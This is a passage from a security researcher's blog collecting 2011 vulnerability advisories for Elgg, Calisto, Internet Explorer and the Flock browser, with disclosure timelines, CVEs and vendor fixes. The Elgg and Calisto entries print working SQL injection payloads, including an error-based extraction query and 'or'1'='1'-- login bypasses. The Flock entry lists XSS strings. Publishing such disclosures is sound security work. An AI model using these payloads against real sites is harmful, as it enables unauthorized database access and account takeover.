include: Australian Government, British Government, Federal Canadian
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,
Johns Hopkins University and more (http://elgg.org/powering.php)


######################
Vulnerability Description
######################

Elgg contains a flaw that may allow an attacker to carry out an
SQL injection attack. The issue is due to the script not properly
sanitizing user-supplied input to 'container_guid' and 'owner_guid'
variables upon submision to 'mod/search/pages/search/index.php'
This may allow an attacker to inject or manipulate SQL queries
in the backend database.

################
Versions afected
################

Elgg 1.8 beta2 vulnerable
Elgg 1.7.10 and prior versions vulnerables
Elgg 1.7.11 not vulnerable

#################
Tecnical details
#################

Injection type is Integer and it only can be exploit via
Mysql error based injection method, it works with
'magic_quotes_gpc' set to 'on' or 'off'


######################
Proof Of Concept
######################

If you know what is error based injection... you know how to use it ;)

URL => http://localhost/elgg/search/?q=someword&search_type=tags&container_guid=7826'

Injections:

and(select 1 from(select count(*),concat((select (select %column_name%) from
`information_schema`.tables limit 0,1),floor(rand(0)*2))x from
`information_schema`.tables
group by x)a) and 1=1

Count(table_name) of information_schema.tables where
table_schema=0x74657374 is 75

Count(column_name) of information_schema.columns where
table_schema=0x74657374 and table_name=0x62616E6C697374 is 4

################
Solution
###############

The vendor has release a updated version to solve this
issue and others see changelog and update your Elgg
instalation to 1.7.11


###############
Timeline
###############

Discovered :July 30, 2011
Vendor Notify:July 30, 2011
Vendor response:July 30, 2011
Vendor Patch: August 15, 2011
Public Disclosure: August 15, 2011

########################## €nd ########################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Calisto light, light plus and full, Sql Injection And user or Admin bypass

Thursday, August 11, 2011
##################################################
Calisto light, light plus and full, Sql Injection And user or Admin bypass
Vendor URL: http://www.calistosoft.com.ar/
Advisore: http://lostmon.blogspot.com/2011/08/calisto-light-light-plus-and-full-sql.html
Vendor notify: YES exploit available: YES
##################################################


##########################
Vulnerability Description
##########################

Calisto Light, Light Plus and Full contains a flaw that may
allow an attacker to carry out an SQL injection attack. The
issue is due to the script not properly sanitizing user-supplied
input to 'usuario' form field and "txtEmail' param upon submision
to 'login.aspx' and '/admin/loginAdmin.aspx' This may allow an
attacker to inject or manipulate SQL queries in the backend database.
#################
UPDATE 14/08/2011
#################

Detalle.aspx, Oferta.aspx, Categoria.aspx, contacto.aspx,
marca.aspx, novedades.aspx, empresa.aspx FAQ.aspx and Registracion.aspx
are afected by this flaw too.

################
Versions afected
################

Calisto Light
Calisto Light plus
Calisto Full

######################
Proof Of Concept
######################

this issue can be used to bypass admin validation or user validation

1- If an attacker writes in 'Usuario' box:

someword'or'1'='1'
and click in login button. wen the aplication post to 'login.aspx'
it shows a nice SQL warning but if write:

someword'or'1'='1'--

it bypass validation. if anyones know a user email, then he can
log as this user :)

2- If an attacker writes in 'usuario' box from admin section:

Admin'or'1'='1'--

And click in login button wen the aplication post to
'/admin/loginAdmin.aspx' it bypass Admin validation. :)


################
Solution
###############

No solution was available at this time.
I have send four emails to calistosoft via his webform
and info and support mails to get initial contact but
they haven't respond :(

###############
Timeline
###############

Discovered : 30-07-2011
Vendor Notify: 7-08-2011
Vendor response: no response.
Workarround patch: no patch
Vendor Patch: no patch
Public Disclosure: 11-08-2011

########################## €nd ########################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability

Tuesday, August 09, 2011
#############################################
Internet Explorer 6, 7 and 8 Window.open race condition Vulnerability
Vendor URL: http://www.microsoft.com
Advisore: http://lostmon.blogspot.com/2011/08/internet-explorer-6-7-and-8-windowopen.html
Coordinate Dislcosure: YES exploit available: Private
CVE-2011-1257 and MS011-57
#############################################

Microsoft Internet Explorer 6, 7 and 8 is prone vulnerable to a
Remote code execution due a race condition in window.open
javascript metod

A Remote attacker can compose a web page with malicious code
and wen a victim visit this malformed web doc, attacker can
exploit this situation.


######################
Solution
######################

Microsoft has issue a bulletin class with tecnical detalis about this issue
with this identifier [MS011-57]

you can found more detailed at this link:
http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx

Also microsoft has issue a patch to solve this vulnerability
see http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx
for update your system.

############
Timeline
############

Discovered : January 13, 2011
Vendor Notify: January 19, 2011
Vendor Response: January 19, 2011
Vendor Patch: August 9, 2011
Public Disclosure: August 9, 2011

################# €nd #########################

Thnx to Michal Zalewski for his extraordinary mind
and knowledge, people like him should have a virtual
statue for the rest of the times

Thnx To Jack, Gerardo, Nate and all MSRC
for his support in this issue.

Thnx To Microsoft Vulnerability Research (MSVR)
for interesting in this issue and for coordinate
Disclosure in other browsers afected.

Thnx to All who Belive in Me include you Estrella :**

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Multiple vulnerabilities in Flock Browser 3.0.0.3989

Friday, March 11, 2011
#########################################
Multiple vulnerabilities in Flock Browser 3.0.0.3989
Vendor URL: http://beta.flock.com/
Vendor Advisores: http://www.flock.com/security/
Advisore:http://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.html
Vendor notify:YES exploits availables:YES
#########################################

Some stuff that i don't have published before , because i don't have time , i'm studing and i need time to read books and study.

Flock is faster, simpler, and more friendly. Literally. It's the only sleek, modern web browser with the built-in ability to keep you up-to-date with your Facebook and Twitter friends. This browser version (3.0.0.3989) is based in a old chromium project (5.0.375.75) and has multiple bugs imported from chrome and his owns bugs :) 
I have contributed in secure Flock browser, i have tested version with google chrome  base.
I have do a list with all issues that i found and Flock Team has release some advisores about it time after.

###############
TODO LIST / Bugs
###############
  1.  Inspector window attributes script injection chrome bug 31590
  2.  XSS in search engine in chrome://history/ chrome bug 13760( not exploitable from remote attackers ) (chrome://history/#q="><iframe src=javascript:alert(1)>&p=0)
  3.  XSS in search box in favorites page ( chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title)(not explotable from remote attackers)
  4.  XSS in search engine extension when paste in url (chrome-extension://flock_people/search.html)( persistent xss)(not exploiable from remote attackers)
  5.  XSS in social extension when try to login in facebook or twiter or youtube (not exploitable from remote attackers)
  6.  XSS in rss vienwer in search box chrome-extension://flock_people/feed_viewer.html?http://path_to_rss ( not exploitable from remote attackers)
  7.  XSS in rss viewner when render xml from remote host if the entry has html it is executed when view the news across flock rss viewner(exploitable via remote sites) (see for example my feed => chrome-extension://flock_people/feed_viewer.html?http://lostmon.blogspot.com/atom.xml) and them if you type in search box for example " or < it executes again the xss stored in xml file :) 
  8. window.open() Method Javascript Same-Origin Policy Violation chrome bug 30660  
  9. url with a leading NULL byte can bypass cross origin protection Chrome bug 37383


###########################
Advisores from Flock developers
###########################
FLOCK-SA-2010-04

Title: window.open() Method Javascript Same-Origin Policy Violation (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4094
CVEs (cve.mitre.org): CVE-2010-0661
Details:
WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method.

Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services (for Chromium) and Lostmon Lords (for Flock).
References: https://bugs.webkit.org/show_bug.cgi?id=32647
http://code.google.com/p/chromium/issues/detail?id=30660

FLOCK-SA-2010-03

Title: javascript: url with a leading NULL byte can bypass cross origin protection (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4112
CVEs (cve.mitre.org): CVE-2010-1236

Details:
A javascript: url with a leading NULL byte can bypass cross origin protection,
which has unspecified impact and remote attack vectors.

Credit to kuzzcc (for Chromium) and Lostmon Lords (for Flock).
References: https://bugs.webkit.org/show_bug.cgi?id=35948
http://code.google.com/p/chromium/issues/detail?id=37383

FLOCK-SA-2010-02

Title: A malicious RSS feed can bypass cross origin protection (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4114
CVEs (cve.mitre.org): CVE-2010-3262

Details:
A malicious RSS feed containg HTML when viewed can bypass cross-origin protection,
which has unspecified impact and remote attack vectors.
Credit to Lostmon Lords.

FLOCK-SA-2010-01

Title: A malformed favourite can bypass cross origin protection (XSS)
Impact: Moderate
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4094
CVEs (cve.mitre.org): CVE-2010-3202
Details:
A malformed favourite imported from an HTML file, imported from another browser,
or manually created can bypass cross-origin protection, which has unspecified impact
and attack vectors.
Credit to Lostmon Lords.
References: http://www.securityfocus.com/archive/1/513214
################################################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...